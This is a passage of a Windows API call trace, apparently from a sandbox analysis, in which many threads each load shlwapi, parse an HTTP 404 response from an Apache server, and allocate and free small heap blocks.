GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.793] GetProcessHeap () returned 0x6a0000 [0302.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0302.793] GetProcessHeap () returned 0x6a0000 [0302.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0302.793] GetProcessHeap () returned 0x6a0000 [0302.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 592 os_tid = 0x18ac [0303.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.061] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.061] GetProcessHeap () returned 0x6a0000 [0303.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0303.061] GetProcessHeap () returned 0x6a0000 [0303.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0303.061] GetProcessHeap () returned 0x6a0000 [0303.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 593 os_tid = 0x18b0 [0303.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.288] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.288] GetProcessHeap () returned 0x6a0000 [0303.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0303.288] GetProcessHeap () returned 0x6a0000 [0303.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0303.288] GetProcessHeap () returned 0x6a0000 [0303.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 594 os_tid = 0x18b4 [0303.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0303.728] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.729] GetProcessHeap () returned 0x6a0000 [0303.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0303.729] GetProcessHeap () returned 0x6a0000 [0303.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0303.729] GetProcessHeap () returned 0x6a0000 [0303.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 595 os_tid = 0x18b8 [0304.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.267] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.267] GetProcessHeap () returned 0x6a0000 [0304.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0304.267] GetProcessHeap () returned 0x6a0000 [0304.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0304.268] GetProcessHeap () returned 0x6a0000 [0304.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 596 os_tid = 0x18bc [0304.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.518] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.518] GetProcessHeap () returned 0x6a0000 [0304.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0304.518] GetProcessHeap () returned 0x6a0000 [0304.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0304.518] GetProcessHeap () returned 0x6a0000 [0304.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 597 os_tid = 0x18c4 [0304.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.882] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.882] GetProcessHeap () returned 0x6a0000 [0304.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0304.882] GetProcessHeap () returned 0x6a0000 [0304.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0304.882] GetProcessHeap () returned 0x6a0000 [0304.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 598 os_tid = 0x18c8 [0305.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.088] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.088] GetProcessHeap () returned 0x6a0000 [0305.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0305.088] GetProcessHeap () returned 0x6a0000 [0305.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0305.088] GetProcessHeap () returned 0x6a0000 [0305.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 599 os_tid = 0x18cc [0305.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.339] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.339] GetProcessHeap () returned 0x6a0000 [0305.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0305.339] GetProcessHeap () returned 0x6a0000 [0305.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0305.339] GetProcessHeap () returned 0x6a0000 [0305.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 600 os_tid = 0x18d0 [0306.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.159] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.159] GetProcessHeap () returned 0x6a0000 [0306.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0306.159] GetProcessHeap () returned 0x6a0000 [0306.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0306.159] GetProcessHeap () returned 0x6a0000 [0306.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 601 os_tid = 0x18d4 [0306.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.607] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.607] GetProcessHeap () returned 0x6a0000 [0306.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0306.607] GetProcessHeap () returned 0x6a0000 [0306.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0306.607] GetProcessHeap () returned 0x6a0000 [0306.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 602 os_tid = 0x18d8 [0307.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.036] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.037] GetProcessHeap () returned 0x6a0000 [0307.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0307.037] GetProcessHeap () returned 0x6a0000 [0307.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0307.037] GetProcessHeap () returned 0x6a0000 [0307.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 603 os_tid = 0x18dc [0307.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.290] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.290] GetProcessHeap () returned 0x6a0000 [0307.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0307.290] GetProcessHeap () returned 0x6a0000 [0307.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0307.290] GetProcessHeap () returned 0x6a0000 [0307.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 604 os_tid = 0x18e4 [0307.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.847] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.847] GetProcessHeap () returned 0x6a0000 [0307.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0307.847] GetProcessHeap () returned 0x6a0000 [0307.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0307.847] GetProcessHeap () returned 0x6a0000 [0307.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 605 os_tid = 0x18e8 [0308.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.108] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.108] GetProcessHeap () returned 0x6a0000 [0308.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0308.109] GetProcessHeap () returned 0x6a0000 [0308.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0308.109] GetProcessHeap () returned 0x6a0000 [0308.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 606 os_tid = 0x18ec [0308.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.452] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.452] GetProcessHeap () returned 0x6a0000 [0308.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0308.452] GetProcessHeap () returned 0x6a0000 [0308.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0308.452] GetProcessHeap () returned 0x6a0000 [0308.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 607 os_tid = 0x18f0 [0308.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.795] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.795] GetProcessHeap () returned 0x6a0000 [0308.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0308.795] GetProcessHeap () returned 0x6a0000 [0308.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0308.795] GetProcessHeap () returned 0x6a0000 [0308.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 608 os_tid = 0x18f4 [0309.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.062] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.063] GetProcessHeap () returned 0x6a0000 [0309.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0309.063] GetProcessHeap () returned 0x6a0000 [0309.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0309.063] GetProcessHeap () returned 0x6a0000 [0309.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 609 os_tid = 0x18f8 [0309.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.217] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.217] GetProcessHeap () returned 0x6a0000 [0309.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0309.218] GetProcessHeap () returned 0x6a0000 [0309.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0309.218] GetProcessHeap () returned 0x6a0000 [0309.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 610 os_tid = 0x18fc [0309.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.420] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.420] GetProcessHeap () returned 0x6a0000 [0309.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0309.420] GetProcessHeap () returned 0x6a0000 [0309.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0309.420] GetProcessHeap () returned 0x6a0000 [0309.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 611 os_tid = 0x1900 [0309.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.811] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.811] GetProcessHeap () returned 0x6a0000 [0309.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0309.811] GetProcessHeap () returned 0x6a0000 [0309.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0309.811] GetProcessHeap () returned 0x6a0000 [0309.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 612 os_tid = 0x1904 [0310.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.080] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.080] GetProcessHeap () returned 0x6a0000 [0310.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0310.080] GetProcessHeap () returned 0x6a0000 [0310.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0310.080] GetProcessHeap () returned 0x6a0000 [0310.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 613 os_tid = 0x1908 [0310.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.365] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.365] GetProcessHeap () returned 0x6a0000 [0310.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0310.366] GetProcessHeap () returned 0x6a0000 [0310.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0310.366] GetProcessHeap () returned 0x6a0000 [0310.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 614 os_tid = 0x190c [0310.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.629] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.629] GetProcessHeap () returned 0x6a0000 [0310.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0310.629] GetProcessHeap () returned 0x6a0000 [0310.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0310.629] GetProcessHeap () returned 0x6a0000 [0310.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 615 os_tid = 0x1910 [0310.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.946] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.946] GetProcessHeap () returned 0x6a0000 [0310.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0310.946] GetProcessHeap () returned 0x6a0000 [0310.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0310.946] GetProcessHeap () returned 0x6a0000 [0310.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 616 os_tid = 0x1914 [0311.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.309] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.309] GetProcessHeap () returned 0x6a0000 [0311.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0311.309] GetProcessHeap () returned 0x6a0000 [0311.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0311.309] GetProcessHeap () returned 0x6a0000 [0311.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 617 os_tid = 0x1918 [0311.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.642] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.642] GetProcessHeap () returned 0x6a0000 [0311.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0311.642] GetProcessHeap () returned 0x6a0000 [0311.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0311.642] GetProcessHeap () returned 0x6a0000 [0311.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 618 os_tid = 0x191c [0311.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.851] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.851] GetProcessHeap () returned 0x6a0000 [0311.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be868 [0311.851] GetProcessHeap () returned 0x6a0000 [0311.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be868 | out: hHeap=0x6a0000) returned 1 [0311.851] GetProcessHeap () returned 0x6a0000 [0311.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 619 os_tid = 0x1920 [0312.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.038] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.038] GetProcessHeap () returned 0x6a0000 [0312.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0312.038] GetProcessHeap () returned 0x6a0000 [0312.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0312.038] GetProcessHeap () returned 0x6a0000 [0312.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 620 os_tid = 0x1924 [0312.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.232] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.232] GetProcessHeap () returned 0x6a0000 [0312.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0312.232] GetProcessHeap () returned 0x6a0000 [0312.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0312.232] GetProcessHeap () returned 0x6a0000 [0312.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 621 os_tid = 0x1928 [0312.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.485] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.485] GetProcessHeap () returned 0x6a0000 [0312.485] RtlAllocateHeap 